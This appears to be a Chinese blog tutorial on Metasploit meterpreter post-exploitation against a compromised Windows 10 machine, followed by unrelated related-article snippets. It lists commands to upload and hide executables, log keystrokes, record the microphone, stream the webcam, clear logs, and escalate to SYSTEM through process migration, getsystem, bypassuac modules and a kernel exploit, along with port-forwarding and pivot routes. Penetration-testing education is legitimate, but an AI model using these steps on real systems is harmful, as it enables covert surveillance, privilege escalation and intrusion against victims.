kali-远程执行命令

文章目录

  • 一、远程执行命令
  • 二、WIN10提权
  • 三、其他提权方法
    • 1.**getsystem**
    • 2.**bypassuac**
    • 3.**内核漏洞提权**

一、远程执行命令

书接上回,监听之后可以远程执行指令

#列出当前所在目录
meterpreter > pwd
#列出本地当前所在目录
meterpreter > lpwd
#跳转指定目录
meterpreter > cd  c:\\
#查看当前目录
meterpreter > dir
#指定上传文件
meterpreter > upload hack.exe
#使用execute命令在目标系统中执行命令
meterpreter > execute  -f notepad.exe       #在对方电脑上,弹出一个记事本.exe
meterpreter > edit a.txt Hello!             #编辑文本
meterpreter > execute -f "notepad.exe a.txt"#使用记事本打开文本
meterpreter > execute -f calc.exe           #在对方电脑上,弹出计算器 
meterpreter > execute -H -i -f cmd.exe      #以后台,隐藏的方式,运行 cmd 
输入:exit  退出
#屏幕截图
meterpreter > screenshot
#屏幕分享
meterpreter > screenshare
#vnc只能看不能操作
meterpreter > run vnc
#键盘监听
meterpreter > keyscan_start 
meterpreter > keyscan_stop
#麦克风监听 秒
meterpreter > record_mic -d 5
#查看摄像头
meterpreter > webcam_list
1: Chicony USB2.0 Camera
#使用设备1拍照
meterpreter > webcam_snap -i 1
#实时监控
meterpreter > webcam_stream -i 1 
#help查看命令
meterpreter > help
#清除windows中的应用程序日志、系统日志、安全日志
meterpreter > clearav

二、WIN10提权

在Windows中,超级管理员权限和系统权限是两种不同的访问权限级别。

超级管理员权限(或称为管理员权限)是Windows操作系统中最高的权限级别之一。具有超级管理员权限的用户拥有对操作系统的完全访问权限,可以执行系统范围的修改、安装和卸载应用程序、更改系统设置等操作。超级管理员权限对系统文件和关键系统组件具有完全控制权。

系统权限是指系统级别的权限,在Windows操作系统中用于控制系统服务和其他系统特性的访问级别。这包括管理网络连接、配置系统时间、监视系统事件日志等功能。系统权限由操作系统自动管理,并且只有特定的系统进程和服务具有这些权限。

需要注意的是,超级管理员权限是一个用户角色,而系统权限是操作系统内部使用的权限级别。超级管理员权限可以被分配给不同的用户账户,而系统权限只能由操作系统进程和服务使用。

在日常使用电脑时,我们通常以管理员权限登录操作系统,这样可以执行大多数常见的管理任务。只有在特定情况下,例如需要修改系统设置或进行高级系统维护时,才需要使用超级管理员权限。

#查看当前用户
meterpreter > getuid     
Server username: WHOISME\13038#查看进程 -s查看系统进程Win10
meterpreter > ps -s
Filtering on SYSTEM processes...
No matching processes were found.
#查看进程
meterpreter > ps
Process List
============PID    PPID   Name                                   Arch  Session  User           Path---    ----   ----                                   ----  -------  ----           ----0      0      [System Process]4      0      System224    4      Registry800    4      smss.exe1140   1000   csrss.exe1172   1652   dwm.exe1240   1324   svchost.exe1244   1000   wininit.exe1252   1236   csrss.exe#当前程序PID
meterpreter > getpid
Current pid: 6576
#win10可以迁移进程系统PID完成提权
meterpreter > migrate 1240#转移到非系统用户,查看资源管理器(用户)进程
meterpreter > ps -S explorer
Filtering on 'explorer'
Process List
============PID   PPID   Name          Arch  Session  User           Path---   ----   ----          ----  -------  ----           ----8060  10100  explorer.exe  x64   1        WHOISME\13038  C:\Windows\explorer.exe
#迁移进程至目标PID
meterpreter > migrate 8060#其他思路#将目标机的3389端口转发到本地6666端口
portfwd add -l 6666 -p 3389 -r 127.0.0.1 
#添加路由
run autoroute –h #查看帮助
run autoroute -s 192.168.159.0/24  #添加到目标环境网络
run autoroute –p  #查看添加的路由

三、其他提权方法

参考CSDN博主「白昼安全」的原创文章方法

1.getsystem

getsystem

getsystem工作原理:

①getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。

②getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。

③Windows服务已启动,导致与命名管道建立连接。

④该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。

2.bypassuac

内置多个bypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要再次执行getsystem获取系统权限,如:

use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask

如何使用bypassuac.rb脚本:

msf > use exploit/windows/local/bypassuac
msf > set SESSION 2
msf > run

3.内核漏洞提权

可先利用enum_patches模块 收集补丁信息,然后查找可用的exploits进行提权

meterpreter > run post/windows/gather/enum_patches  #查看补丁信息
msf > use exploit/windows/local/ms13_053_schlamperei
msf > set SESSION 2
msf > exploit

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/233847.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2023中国品牌节金谱奖荣誉发布 酷开科技获颁OTT行业科技创新奖

11月17日—19日,以“复苏与腾飞”为主题的2023第十七届中国品牌节,在杭州市云栖小镇国际会展中心成功举行。在18日晚间的荣耀盛典上,“TopBrand 2023中国品牌节金谱奖”荣誉发布,酷开科技斩获OTT行业科技创新奖。 酷开科技作为OTT…

sklearn和tensorflow的理解

人工智能的实现是基于机器学习,机器学习的一个方法是神经网络,以及各种机器学习算法库。 有监督学习:一般数据构成是【特征值目标值】 无监督学习:一般数据构成是【特征值】 Scikit-learn(sklearn)的定位是通用机器学习库&…

2023/12/19 work

1. 基于UDP的TFTP文件传输 #include <stdio.h> #include <string.h> #include <stdlib.h> #include <myhead.h>//实现下载功能 int do_download(int cfd, struct sockaddr_in sin) {//定义变量存储下载请求包char buf[516] "";//定义变量存…

ubuntu22.04制作pycharm的桌面快捷方式

在Ubuntu 22.04上创建PyCharm的桌面快捷方式可以通过以下步骤完成&#xff1a; 打开终端&#xff1a;按下Ctrl Alt T组合键&#xff0c;或者在应用程序菜单中找到终端并打开。 使用以下命令进入到应用程序目录。请根据你安装PyCharm的位置进行调整&#xff0c;以下命令中的/…

工作服穿戴监测识别摄像机

工作服穿戴监测识别摄像机是一种通过图像识别技术&#xff0c;实时监测和识别工作场所穿戴的工作服是否符合要求的设备。它可以有效地监测员工是否穿戴了正确的工作服&#xff0c;提高工作场所的安全性和管理效率。 这种摄像机利用先进的计算机视觉技术&#xff0c;能够快速准确…

九牧:科技卫浴,长期主义

“没有做错什么&#xff0c;但却输给了时代”&#xff0c;这是人们给当年手机巨头诺基亚的注解。 谁也没有想到&#xff0c;曾在手机行业称雄的诺基亚&#xff0c;最终败给了时代。当年&#xff0c;在2G向3G、4G跨越的时候&#xff0c;苹果、微软的iOS和安卓系统将手机从简单的…

【QT】C++/Qt使用Qt自带工具windeployqt打包

基本操作 运行项目debug或者release 将运行后的可执行文件单独放到一个文件夹中 根据项目使用的kits来选择Qt的打包工具 打开工具后移动到exe文件夹下执行windeployqt xxx.exe 预览图 问题 打包后再其他电脑上运行出现下图错误 将自己电脑的这个文件拷到可执行文件夹中既…

redis 7.2.3 官方配置文件 redis.conf sentinel.conf

文章目录 Intro解压配置使用等官方配置文件模板redis.conf 仅配置项redis.conf 完整版(配置项注释)sentinel.conf 仅配置项sentinel.conf 完整版(配置项注释) Intro 在下载页面&#xff1a;https://redis.io/download/ 下载最新版本的redis&#xff1a; https://github.com/re…

linux搭建gitlab

gitlab的介绍 区别于github&#xff0c;github是面向互联网基于git实现的代码托管平台&#xff0c;gitlab是基于Ruby语言实现的git管理平台软件&#xff0c;一般用于公司内部代码仓库。 gitlab组成 Nginx 静态Web服务器Gitlab-workhorse 轻量级的反向代理服务器Gitlab-shell 用…

PHP 读取excel输入为HTML

目录 介绍 安装扩展 读取excel文件 输入为html 保存到文件 总结 介绍 以前都是使用phpexcel&#xff0c;不过已经不再更新了&#xff0c; 不过不用担心还可以使用phpspreadsheet来替代它进行操作。 PHPSpreadsheet-在PHP中读取、创建和编写电子表格文档-电子表格引擎。…

docker 安装及配置 nginx + tomcat(四):高可用

文章目录 1. 引言2. 高可用架构3. 实际步骤3.1 虚拟机新建系统3.2 安装 keepalived3.3 配置 keepalived3.4 启动 keepalived3.5 验证高可用3.5.1 查看当前效果3.5.2 模拟灾难 4 参考 1. 引言 前情提要&#xff1a; 《docker 安装及配置 nginx tomcat&#xff08;一&#xff0…

C语言初学5:运算符

一、算数运算符 假设变量 A 的值为 10 运算符描述实例A先赋值后运算C A C为10 A为11A--C A-- C为10 A为9A先运算后赋值C A C为11 A为11--AC --A C为9 A为9 二、位运算符 运算符描述实例&对两个操作数的每一位执行逻辑与操作&#xff0c;如果两个相应的位都为 1&…

Arcgis导出为tiff

原有一幅影像&#xff0c;在进行一些操作之后&#xff0c;需要导出为tiff 比如我对他进行一个重采样&#xff0c;48m分辨率变为96m 在重采样后的数据图层上右键&#xff0c;导出数据 为什么有时会导出为.gdb格式的呢&#xff1f; 可能是位置处在一个文件地理数据库.gdb下

【go-zero】 go-zero API 如何接入 Nacos 被 java 服务调用 | go集成java服务

一、场景 外层使用的是springcloud alibaba 这一套java的分布式架构 然后需要接入go-zero的api服务 这里我们将对api服务接入Nacos进行一个说明 二、实战 1、package 因为使用的是go-zero框架 这里我们会优先使用go-zero生态的包 github 包如下: github.com/nacos-group/naco…

「Verilog学习笔记」游戏机计费程序

专栏前言 本专栏的内容主要是记录本人学习Verilog过程中的一些知识点&#xff0c;刷题网站用的是牛客网 timescale 1ns/1nsmodule game_count(input rst_n, //异位复位信号&#xff0c;低电平有效input clk, //时钟信号input [9:0]money,input set,input boost,output reg[9:0…

图灵日记之Leetcode链表中间结点牛客链表中倒数第k个结点Leetcode合并两个有序链表leetcode反转链表

题目 链表的中间结点原题入口题目内容题目解析思路一代码实现一思路二代码实现二 链表中倒数第k个结点题目链接题目内容思路代码实现 合并两个有序链表原题入口题目内容思路代码实现 反转链表题目传送入口题目内容思路一代码复现一思路二代码实现二 链表的中间结点 原题入口 …

java线程池执行任务时异常被吃掉

问题 今天在测试环境通过线程池执行任务时突然被中断&#xff0c;跟踪日志发现代码跑到一半后面的日志就不再打印&#xff0c;而且也没有任何异常堆栈信息&#xff0c;也就是说程序执行被中断了&#xff0c;后面反复尝试经排查发现是线程池使用不当导致。 测试验证 我们用线程…

网络的发展历史,ip地址

TCP/IP 是获得最广泛支持的通信协议集合 包含了大量internet应用的标准协议 -支持跨网络架构&#xff0c;跨操作系统平台的通信 主机与主机之间通信的三个要素 1.ip地址(ip address) 2.子网掩码(subent mask) 3.ip路由(ip router) ip地址&#xff1a; 作用&#xff1a;用…

【深度学习】语言模型与注意力机制以及Bert实战指引之一

文章目录 统计语言模型和神经网络语言模型注意力机制和Bert实战Bert 统计语言模型和神经网络语言模型 区别&#xff1a;统计语言模型的本质是基于词与词共现频次的统计&#xff0c;而神经网络语言模型则是给每个词赋予了向量空间的位置作为表征&#xff0c;从而计算它们在高维…

mutable property that could have been changed by this time

情形&#xff1a; 网络请求json数据&#xff0c;本地创建实体类接收json&#xff0c;实体类中的变量为var可变类型&#xff0c;将实体类的变量赋值给一个局部变量&#xff0c;将局部变量作为参数传给其它方法时&#xff0c;遇到一个问题 &#xff1a; ”Smart cast to String …